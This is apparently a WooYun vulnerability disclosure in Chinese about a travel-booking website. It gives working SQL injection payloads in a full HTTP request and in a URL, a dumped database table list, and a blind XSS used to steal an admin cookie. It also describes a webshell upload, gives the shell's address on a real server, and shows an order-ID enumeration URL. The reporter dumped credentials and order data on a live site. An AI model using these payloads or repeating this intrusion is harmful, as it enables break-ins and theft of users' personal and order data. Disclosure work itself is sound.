当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191726

漏洞标题:八个六阳光航空旅游网几处风险泄露用户个人信息\个人登录密码\订单信息(影响10W+用户数据)

相关厂商:八个六阳光航空旅游网

漏洞作者: 路人甲

提交时间:2016-04-05 13:06

修复时间:2016-05-20 13:10

公开时间:2016-05-20 13:10

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞小集合

详细说明:

一 :
先贴出用户量:18W+

12.png


0x1:先来两枚SQL注入漏洞:
----------------------------------------------------------------------------------------

POST /ajax/querySpeTicket4Date.action HTTP/1.1
Host: www.66666666.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.66666666.com/speTic4Recently.action?depCode=CGO&reaCode=LHW&flightDate=2016-03-30
Content-Length: 23
Cookie: JSESSIONID=460F770E422FAB60C7D2A787FE81757D; Hm_lvt_f5e3bd8d027c1dcf84d56a9886d322db=1459252966; Hm_lpvt_f5e3bd8d027c1dcf84d56a9886d322db=1459253581; Hm_lvt_eb39dfed1031da9fa5752da0eb74b1da=1459252966; Hm_lpvt_eb39dfed1031da9fa5752da0eb74b1da=1459253581; depCode=CGO; depCity=%E9%83%91%E5%B7%9E
Connection: keep-alive
depCode=CGO21257723'%20or%20'4816'%3d'4816&reaCode=LHW


参数:depCode存在注入点

6.png


--------------------------------------------------------------------------------------
0x2:第二枚注入:
http://www.66666666.com//sbnapp/member/member!coupon.action?pt=ios&userId=woyun' or '1'='1
正常情况下是没有任何有优惠券的:

9.png


带入语句满满的全是爱:

8.png


带入时间延时语句成功执行:

7.png


10.png


Database: ah7q89up
[105 tables]
+----------------------+
| c_cou_ext            |
| c_coupon             |
| c_type               |
| c_type_ext           |
| h_area               |
| h_brand              |
| h_data               |
| h_geo                |
| h_geo_extra          |
| h_hotel              |
| h_hotel_id           |
| h_hotel_imgs         |
| h_hotel_lack         |
| h_hotel_list         |
| h_hotel_log          |
| h_hotel_member_list  |
| h_hotel_rooms        |
| h_o_i_recipient      |
| h_order              |
| h_order_card         |
| h_order_contact      |
| h_order_customer     |
| h_order_invoice      |
| l_area               |
| l_lines              |
| l_lines_arrcity      |
| l_lines_collections  |
| l_lines_date         |
| l_lines_hot_city     |
| l_lines_trip         |
| l_order              |
| l_order_type         |
| t_act_goods          |
| t_act_lottery_acount |
| t_act_lottery_nper   |
| t_act_lottery_order  |
| t_act_order          |
| t_act_order_ly       |
| t_act_pro            |
| t_act_pro_jfcode     |
| t_act_pro_order      |
| t_act_yw             |
| t_activity           |
| t_activity_ca        |
| t_activity_hb        |
| t_ad_picture         |
| t_advice             |
| t_airline            |
| t_announcement       |
| t_app_tui            |
| t_app_tui_act1       |
| t_area               |
| t_authority          |
| t_cabin_close        |
| t_city_airport       |
| t_credentials        |
| t_flight_cabin       |
| t_flight_trans       |
| t_giftcart           |
| t_giftorder          |
| t_giftorder_detail   |
| t_groupticket_apply  |
| t_iata               |
| t_lottery            |
| t_member             |
| t_message            |
| t_name_list          |
| t_orderflight        |
| t_pay_mess           |
| t_pro_appraise       |
| t_pro_picture        |
| t_procount           |
| t_product            |
| t_pun_rate           |
| t_que_answer         |
| t_question           |
| t_restdata           |
| t_role               |
| t_role_authority     |
| t_sort               |
| t_specity            |
| t_speflight          |
| t_speticket          |
| t_sys_log            |
| t_ticket_remind      |
| t_ticketorder        |
| t_ticketperson       |
| t_user               |
| t_user_address       |
| t_user_answer        |
| t_user_coupon        |
| t_user_ext           |
| t_user_ggk           |
| t_user_lottery       |
| t_user_role          |
| t_user_wx            |
| t_version            |
| t_visa               |
| t_visa_area          |
| t_visa_order         |
| t_visa_order_type    |
| t_visa_type          |
| t_visit_log          |
| t_visitor_his_log    |
| t_visitor_log        |
+----------------------+


贴出站内部分用户的账户密码:

13.png


后台管理员账户信息:

17.png

漏洞证明:

二 : 也是个高危漏洞,盲打后台前端插入语句:

14.png


返回COOKIE见图:

15.png


现在管理员COOKIE,账户密码都有了,想怎么进就怎么进,后台地址:

16.png


各种订单,酒店订单,飞机订单,旅游订单,上万数据订单信息及用户敏感信息:

1.png


2.png


3.png


上传处校验不严,只是对后缀名与文件头部特征码进行校验,制造一个图片马截断改后缀即可:
寻找getshell方法,不知道什么原因马总是出现解析错误,遇到过很多次未能解决

http://116.255.199.103/sbn/pic/resources/giftPictures/ma.jsp


--------------------------------------------------------------------------------------
三:越权问题,可查看任意用户订单信息很多处,酒店订单,旅游订单,机票订单,不再一一说明,指出一处见下图:

http://www.66666666.com/sbnapp/travel/travel!getOrderDetail.action?id=280


23.png


遍历一下ID可查看订单信息:

4.png


5.png

修复方案:

过滤防范SQL注入与XSS,权限验证防止越权漏洞。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)

漏洞评价:

评价